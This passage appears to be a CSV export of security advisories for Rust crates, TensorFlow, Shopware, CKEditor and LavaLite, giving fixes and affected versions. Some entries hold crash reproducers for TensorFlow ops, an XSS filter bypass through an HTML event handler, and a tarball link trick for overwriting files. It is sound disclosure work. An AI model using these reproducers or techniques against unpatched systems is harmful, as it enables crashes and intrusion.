'url': 'https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf5b1016fb15b7118b9a5e16bb0b78cb4f1dfcf7821eb137ab5757c91@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf68442d67eb166f4b6cf0bbbe6c7f99098c12954f37332073c9822ca%40%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211022-0001/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/2'}]","{'cwe_ids': ['CWE-130', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-14T18:11:52Z', 'nvd_published_at': '2021-07-13T08:15:00Z'}" +1.4.0,GHSA-rmff-f8w9-c9rm,2021-08-18T19:14:45Z,2021-08-25T20:59:22Z,,['CVE-2020-36472'],Data races in max7301,"The `ImmediateIO` and `TransactionalIO` types implement `Sync` for all contained +`Expander` types regardless of if the `Expander` itself is safe to use +across threads. + +As the `IO` types allow retrieving the `Expander`, this can lead to non-thread +safe types being sent across threads as part of the `Expander` leading to data +races. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'max7301'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36472'}, {'type': 'WEB', 'url': 'https://github.com/edarc/max7301/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/edarc/max7301/commit/0a1da873ddb29bca926bad8301f8d7ab8aa97c52'}, {'type': 'PACKAGE', 'url': 'https://github.com/edarc/max7301'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0152.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T17:25:44Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-g83m-67wh-whpw,2021-08-18T20:31:24Z,2021-08-25T20:57:10Z,,['CVE-2020-36449'],Command injection in kekbit,"An issue was discovered in the kekbit crate before 0.3.4 for Rust. For ShmWriter, Send is implemented without requiring H: Send.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'kekbit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36449'}, {'type': 'WEB', 'url': 'https://github.com/motoras/kekbit/issues/34'}, {'type': 'PACKAGE', 'url': 'https://github.com/motoras/kekbit'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0129.html'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:31:24Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-mc36-5m36-hjh5,2021-08-18T20:21:54Z,2021-08-25T20:58:00Z,,['CVE-2020-36455'],Data races in slock,An issue was discovered in the slock crate through 2020-11-17 for Rust. Slock unconditionally implements Send and Sync.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'slock'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36455'}, {'type': 'WEB', 'url': 'https://github.com/BrokenLamp/slock-rs/issues/2'}, {'type': 'WEB', 'url': 'https://github.com/BrokenLamp/slock-rs/commit/719df35f55b6cab4ca2a7f840347a06ecbd8aac6'}, {'type': 'PACKAGE', 'url': 'https://github.com/BrokenLamp/slock-rs'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/slock/RUSTSEC-2020-0135.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0135.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:21:54Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-rhrq-64mq-hf9h,2021-08-24T17:06:32Z,2021-08-25T14:40:16Z,,['CVE-2021-37683'],FPE in TFLite division operations,"### Impact +The implementation of division in TFLite is [vulnerable to a division by 0 error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/div.cc) + +There is no check that the divisor tensor does not contain zero elements. + +### Patches +We have patched the issue in GitHub commit [1e206baedf8bef0334cca3eb92bab134ef525a28](https://github.com/tensorflow/tensorflow/commit/1e206baedf8bef0334cca3eb92bab134ef525a28). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rhrq-64mq-hf9h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37683'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1e206baedf8bef0334cca3eb92bab134ef525a28'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T17:06:32Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-xh55-2fqp-p775,2021-08-26T19:40:02Z,2021-08-30T16:14:09Z,,['CVE-2021-37708'],Command injection in mail agent settings,"### Impact +Command injection in mail agent settings + +### Patches +We recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-xh55-2fqp-p775'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37708'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/82d8d1995f6ce9054323b2c3522b1b3cf04853aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T19:40:02Z', 'nvd_published_at': '2021-08-16T20:15:00Z'}" +1.4.0,GHSA-c3cw-c387-pj65,2023-06-13T17:11:24Z,2021-08-25T20:43:21Z,,['CVE-2018-20996'],Double free in crossbeam,"Even if an element is popped from a queue, crossbeam would run its destructor inside the epoch-based garbage collector. This is a source of double frees. + +The flaw was corrected by wrapping elements inside queues in a ManuallyDrop.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'crossbeam'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20996'}, {'type': 'WEB', 'url': 'https://github.com/crossbeam-rs/crossbeam-epoch/issues/82'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossbeam-rs/crossbeam-epoch'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0009.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:34Z', 'nvd_published_at': None}" +1.4.0,GHSA-jjx5-3f36-6927,2021-08-18T21:31:51Z,2021-08-25T20:55:47Z,,['CVE-2021-38188'],Incorrect buffer size calculation in iced-x86,"An issue was discovered in the iced-x86 crate through 1.10.3 for Rust. In Decoder::new(), slice.get_unchecked(slice.length()) is used unsafely.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'iced-x86'}, 'ecosystem_specific': {'affected_functions': ['iced_x86::Decoder::new']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38188'}, {'type': 'WEB', 'url': 'https://github.com/icedland/iced/issues/168'}, {'type': 'WEB', 'url': 'https://github.com/icedland/iced/commit/3c607a003e03b773108401d109167d1840487dce'}, {'type': 'PACKAGE', 'url': 'https://github.com/icedland/iced'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0068.html'}]","{'cwe_ids': ['CWE-131'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:31:51Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-rw2c-c256-3r53,2023-06-13T18:08:34Z,2021-08-25T20:51:52Z,,['CVE-2020-36215'],Data races in hashconsing,Affected versions of hashconsing implements Send/Sync for its HConsed type without restricting it to Sendable types and Syncable types. This allows non-Sync types such as Cell to be shared across threads leading to undefined behavior and memory corruption in concurrent programs.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'hashconsing'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36215'}, {'type': 'WEB', 'url': 'https://github.com/AdrienChampion/hashconsing/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/AdrienChampion/hashconsing'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0107.html'}]","{'cwe_ids': ['CWE-662', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:47:26Z', 'nvd_published_at': '2021-01-26T18:15:00Z'}" +1.4.0,GHSA-hwr7-8gxx-fj5p,2021-08-23T18:10:19Z,2021-08-25T14:44:09Z,,['CVE-2021-37638'],Null pointer dereference in `RaggedTensorToTensor`,"### Impact +Sending invalid argument for `row_partition_types` of `tf.raw_ops.RaggedTensorToTensor` API results in a null pointer dereference and undefined behavior: + +```python +import tensorflow as tf + +tf.raw_ops.RaggedTensorToTensor( + shape=1, + values=10, + default_value=21, + row_partition_tensors=tf.constant([0,0,0,0]), + row_partition_types=[]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/47a06f40411a69c99f381495f490536972152ac0/tensorflow/core/kernels/ragged_tensor_to_tensor_op.cc#L328) accesses the first element of a user supplied list of values without validating that the provided list is not empty. + +### Patches +We have patched the issue in GitHub commit [301ae88b331d37a2a16159b65b255f4f9eb39314](https://github.com/tensorflow/tensorflow/commit/301ae88b331d37a2a16159b65b255f4f9eb39314). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hwr7-8gxx-fj5p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37638'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/301ae88b331d37a2a16159b65b255f4f9eb39314'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:10:19Z', 'nvd_published_at': '2021-08-12T19:15:00Z'}" +1.4.0,GHSA-2367-c296-3mp2,2023-06-13T21:53:47Z,2021-08-25T20:43:54Z,,['CVE-2018-20990'],Arbitrary file overwrite in tar-rs,"When unpacking a tarball with the unpack_in-family of functions it's intended that only files within the specified directory are able to be written. Tarballs with hard links or symlinks, however, can be used to overwrite any file on the filesystem. Tarballs can contain multiple entries for the same file. A tarball which first contains an entry for a hard link or symlink pointing to any file on the filesystem will have the link created, and then afterwards if the same file is listed in the tarball the hard link will be rewritten and any file can be rewritten on the filesystem.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20990'}, {'type': 'WEB', 'url': 'https://github.com/alexcrichton/tar-rs/pull/156'}, {'type': 'WEB', 'url': 'https://github.com/alexcrichton/tar-rs/commit/54651a87ae6ba7d81fcc72ffdee2ea7eca2c7e85'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrichton/tar-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0002.html'}]","{'cwe_ids': ['CWE-59'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:12Z', 'nvd_published_at': None}" +1.4.0,GHSA-m94c-37g6-cjhc,2022-02-08T21:01:39Z,2021-08-23T19:42:15Z,,['CVE-2021-37695'],Fake objects feature vulnerability allowing to execute JavaScript code using malformed HTML.,"### Affected packages +The vulnerability has been discovered in [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) plugin. All plugins with [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) plugin dependency are affected: + +* [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) +* [Link](https://ckeditor.com/cke4/addon/link) +* [Flash](https://ckeditor.com/cke4/addon/flash) +* [Iframe](https://ckeditor.com/cke4/addon/iframe) +* [Forms](https://ckeditor.com/cke4/addon/forms) +* [Page Break](https://ckeditor.com/cke4/addon/pagebreak) + +### Impact +A potential vulnerability has been discovered in CKEditor 4 [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) package. The vulnerability allowed to inject malformed Fake Objects HTML, which could result in executing JavaScript code. It affects all users using the CKEditor 4 plugins listed above at version < 4.16.2. + +### Patches +The problem has been recognized and patched. The fix will be available in version 4.16.2. + +### For more information +Email us at security@cksource.com if you have any questions or comments about this advisory. + +### Acknowledgements +The CKEditor 4 team would like to thank Mika Kulmala ([kulmik](https://github.com/kulmik)) for recognizing and reporting this vulnerability. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.16.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-m94c-37g6-cjhc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37695'}, {'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/commit/de3c001540715f9c3801aaa38a1917de46cfcf58'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor4'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/11/msg00007.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:15:12Z', 'nvd_published_at': '2021-08-13T00:15:00Z'}" +1.4.0,GHSA-cv7x-6rc6-pq5v,2023-06-13T17:00:36Z,2021-08-25T20:53:05Z,,['CVE-2021-25907'],Double free in containers,"Upon panic in a user-provided function f, fn mutate() & fn mutate2 drops twice a same object. + +Affected versions of this crate did not guard against double drop while temporarily duplicating an object's ownership with ptr::read(). + +Dropping a same object can result in memory corruption. + +The flaw was corrected in version ""0.9.11"" by fixing the code to abort upon panic.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'containers'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25907'}, {'type': 'WEB', 'url': 'https://github.com/strake/containers.rs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/strake/containers.rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0010.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:40:39Z', 'nvd_published_at': None}" +1.4.0,GHSA-v2f3-f8x4-m3w8,2023-07-06T21:32:19Z,2021-08-09T20:38:54Z,,['CVE-2020-23234'],Cross Site Scripting in LavaLite CMS,"Cross Site Scripting (XSS) vulnerabiity exists in LavaLite CMS 5.8.0 via the Menu Blocks feature, which can be bypassed by using HTML event handlers, such as ""ontoggle,"".","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'lavalite/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23234'}, {'type': 'WEB', 'url': 'https://github.com/LavaLite/cms/issues/320'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T21:50:55Z', 'nvd_published_at': '2021-07-26T20:15:00Z'}" +1.4.0,GHSA-xp6v-qx65-4pp7,2023-06-13T18:10:24Z,2021-08-25T20:50:39Z,,['CVE-2020-36211'],Data races in gfwx,"In the affected versions of this crate, ImageChunkMut<'_, T> unconditionally implements Send and Sync, allowing to create data races. + +This can result in a memory corruption or undefined behavior when non thread-safe types are moved and referenced across thread boundaries. + +The flaw was corrected in commit e7fb2f5 by adding T: Send bound to the Send impl and adding T: Sync bound to the Sync impl.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'gfwx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36211'}, {'type': 'WEB', 'url': 'https://github.com/Devolutions/gfwx-rs/issues/7'}, {'type': 'PACKAGE', 'url': 'https://github.com/Devolutions/gfwx-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0104.html'}]","{'cwe_ids': ['CWE-662', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:53:42Z', 'nvd_published_at': None}" +1.4.0,GHSA-3358-4f7f-p4j4,2021-08-18T21:16:25Z,2021-08-25T20:56:12Z,,['CVE-2020-36465'],Use after free in generic-array,An issue was discovered in the generic-array crate before 0.13.3 for Rust. It violates soundness by using the arr! macro to extend lifetimes.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'generic-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.13.0'}, {'fixed': '0.13.3'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'generic-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.12.0'}, {'fixed': '0.12.4'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'generic-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.11.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'generic-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.10.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'generic-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.0'}, {'fixed': '0.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36465'}, {'type': 'WEB', 'url': 'https://github.com/fizyk20/generic-array/issues/98'}, {'type': 'PACKAGE', 'url': 'https://github.com/fizyk20/generic-array'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0146.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:16:25Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-w4xf-2pqw-5mq7,2021-08-24T13:57:28Z,2021-08-25T14:42:13Z,,['CVE-2021-37666'],Reference binding to nullptr in `RaggedTensorToVariant`,"### Impact +An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.RaggedTensorToVariant`: + +```python +import tensorflow as tf + +tf.raw_ops.RaggedTensorToVariant( + rt_nested_splits=[], + rt_dense_values=[1,2,3], + batched_input=True) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/ragged_tensor_to_variant_op.cc#L129) has an incomplete validation of the splits values, missing the case when the argument would be empty. + +### Patches +We have patched the issue in GitHub commit [be7a4de6adfbd303ce08be4332554dff70362612](https://github.com/tensorflow/tensorflow/commit/be7a4de6adfbd303ce08be4332554dff70362612). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 